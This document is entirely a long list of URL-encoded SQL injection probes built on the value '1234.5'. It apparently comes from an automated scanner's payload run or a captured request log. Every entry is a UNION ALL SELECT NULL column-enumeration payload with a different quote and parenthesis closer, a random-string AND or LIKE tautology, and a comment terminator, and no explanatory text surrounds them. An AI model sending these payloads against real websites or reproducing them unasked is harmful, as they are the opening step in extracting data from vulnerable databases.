1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285669%3D5669 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289072%3D9072 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283542%3D3542 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285076%3D5076 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27gpMW%27%3D%27gpMW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27sbjX%27%3D%27sbjX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27RroN%27%3D%27RroN 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27vjmX%27%3D%27vjmX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27XCfI%27%3D%27XCfI 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27tZAb%27%3D%27tZAb 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27FRgl%27%3D%27FRgl 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27UpVG%27%3D%27UpVG 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27uysL%27%3D%27uysL 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27LkCF%27%3D%27LkCF 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27poJG%27%3D%27poJG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27jxaP%27%3D%27jxaP 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27FeAD%27%3D%27FeAD 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27BpPN%27%3D%27BpPN 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27HbzE%27%3D%27HbzE 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27xhDr%27%3D%27xhDr 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27jtXv%27%3D%27jtXv 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27TchM%27%3D%27TchM 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27hlpp%27%3D%27hlpp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27coqS%27%3D%27coqS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27aztn%27%3D%27aztn 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27FlGG%27%3D%27FlGG 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27VMRd%27%3D%27VMRd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27XiYB%27%3D%27XiYB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27GLlM%27%3D%27GLlM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27EzOd%27%3D%27EzOd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27IyTd%27%3D%27IyTd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27IYBs%27%3D%27IYBs 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27sInt%27%3D%27sInt 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27LiwC%27%3D%27LiwC 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27qROn%27%3D%27qROn 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xRRS%27%3D%27xRRS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27jCat%27%3D%27jCat 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27rVjF%27%3D%27rVjF 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27uHhp%27%3D%27uHhp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27HKDP%27%3D%27HKDP 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27fRwu%27%3D%27fRwu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27KJfs%27%3D%27KJfs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27gcfw%27%3D%27gcfw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27MVSH%27%3D%27MVSH 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27RRTz%27%20LIKE%20%27RRTz 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27xpbt%27%20LIKE%20%27xpbt 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27sEoW%27%20LIKE%20%27sEoW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27EbgP%27%20LIKE%20%27EbgP 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27abiN%27%20LIKE%20%27abiN 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27AMpZ%27%20LIKE%20%27AMpZ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27WlqU%27%20LIKE%20%27WlqU 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Vzqm%27%20LIKE%20%27Vzqm 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27VITi%27%20LIKE%20%27VITi 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27moQN%27%20LIKE%20%27moQN 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27mBtg%27%20LIKE%20%27mBtg 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27PcNh%27%20LIKE%20%27PcNh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27GkzK%27%20LIKE%20%27GkzK 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27gddj%27%20LIKE%20%27gddj 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ewtw%27%20LIKE%20%27ewtw 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27zmQm%27%20LIKE%20%27zmQm 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27znho%27%20LIKE%20%27znho 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27TwPB%27%20LIKE%20%27TwPB 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27QiFt%27%20LIKE%20%27QiFt 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27yBmR%27%20LIKE%20%27yBmR 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27Brxz%27%20LIKE%20%27Brxz 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27EDZy%27%20LIKE%20%27EDZy 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27PExS%27%20LIKE%20%27PExS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27NKCf%27%20LIKE%20%27NKCf 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27LZDO%27%20LIKE%20%27LZDO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27YMOW%27%20LIKE%20%27YMOW 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27yHDS%27%20LIKE%20%27yHDS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27cqIr%27%20LIKE%20%27cqIr 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27uQuK%27%20LIKE%20%27uQuK 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27nNVH%27%20LIKE%20%27nNVH 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27DnRM%27%20LIKE%20%27DnRM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27TzDO%27%20LIKE%20%27TzDO 